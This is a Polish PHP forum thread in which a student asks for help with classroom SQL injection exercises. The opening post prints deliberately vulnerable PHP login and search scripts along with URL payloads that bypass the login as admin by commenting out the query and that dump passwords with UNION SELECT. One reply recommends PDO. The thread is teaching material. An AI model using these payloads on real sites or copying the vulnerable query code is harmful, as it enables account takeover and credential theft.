sql injection - Forum PHP.pl

sql injection

szokmen Zobacz profil	4.11.2010, 19:12:02 Post #1
Grupa: Zarejestrowani Postów: 30 Pomógł: 0 Dołączył: 19.05.2010 Ostrzeżenie: (0%)	Witam, dostałem do zrobienia ćwiczenia które mam wykonać na podstawie materiałów dołączonych do ćwiczeń. Jednak nie mogę zrobić dwóch zadań: Pierwsze: Używając skryptu P02.php zalogować się na konto admin wykorzystując komentowanie niechcianego fragmentu zapytania. Skrypt P02.php; [PHP] pobierz, plaintext <?php include('cfg.php'); $z="SELECT id FROM uzytkownicy WHERE login='$login' AND haslo='$haslo'"; echo($z.'<br>'); $q=mysql_query($z); $txt=mysql_fetch_array($q); if (isset($txt['id'])) {big('Zalogowany! ID: '.$txt['id']);} else {big('Error');} ?> [PHP] pobierz, plaintext cfg.php to tylko połączenie z bazą. Według materiałów powinno to zostać zrobione mniej więcej tak zapytanie w P02.php powinniśmy zmienić na: [SQL] pobierz, plaintext SELECT id FROM użytkownicy WHERE login =’/* [SQL] pobierz, plaintext a w przeglądarce internetowej powinniśmy wpisać htp://adres/lokalizacja/nazwa_skryptu.php?login=admin'/* (oczywiście powinny być dwa "t" w http.) Drugie zadanie: Wykorzystując umiejętności z poprzednich zadań oraz funkcję PHP concat, a także skrypt P04.php wydobyć z bazy wszystkie loginy i hasła znajdujące się w bazie MySQL. Skrypt P04.php: [PHP] pobierz, plaintext <?php include('cfg.php'); $z="SELECT login FROM uzytkownicy WHERE login LIKE '$login%' LIMIT 2"; echo($z.'<br>'); $q=mysql_query($z); echo('<br>Znalezione rekordy:<br>'); while ($txt=mysql_fetch_array($q)){ echo($txt['login'].'<br>'); } ?> [PHP] pobierz, plaintext według materiałów powinno to zostać zrobione tak, zapytanie w skrypcie P04.php zamieniamy na: [SQL] pobierz, plaintext SELECT login FROM użytkownicy WHERE login LIKE ’%’ AND 1=2 UNION SELECT haslo from uzytkownicy /* LIMIT 2 [SQL] pobierz, plaintext a w przeglądarkę wpisujemy htp://adres/lokalizacja/nazwa_skryptu.php?login=%' and 1=2 union select haslo from uzytkownicy /* Proszę o wskazówki co robię nie tak.

Odpowiedzi

kiler129 Zobacz profil	5.11.2010, 00:41:31 Post #2
Grupa: Zarejestrowani Postów: 566 Pomógł: 35 Dołączył: 21.06.2006 Ostrzeżenie: (0%)	Widzę, że uczysz się programować. Wyrób sobie dobre nawyki jak np. używanie PDO zamiast mysql_*(). PHP staje się coraz bardziej obiektowym językiem i niektóre funckje stają sie depraced, poleganie na np. magic quotes się niedługo skończy (IMG:style_emoticons/default/winksmiley.jpg)

Posty w temacie

szokmen sql injection 4.11.2010, 19:12:02

fifi209 w drugim ma być: ' and 1=2 union select conca... 4.11.2010, 20:57:26

kiler129 Widzę, że uczysz się programować. Wyrób sobie dobr... 5.11.2010, 00:41:31

fifi209 Cytat(kiler129 @ 5.11.2010, 00:41:31 ... 5.11.2010, 08:37:21

kiler129 Faktycznie To tK jest jak się pisze po nocach kod... 5.11.2010, 12:33:06

« Następny starszy · PHP · Następny nowszy »

2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

Aktualny czas: 5.10.2025 - 03:28

Hosting zapewnia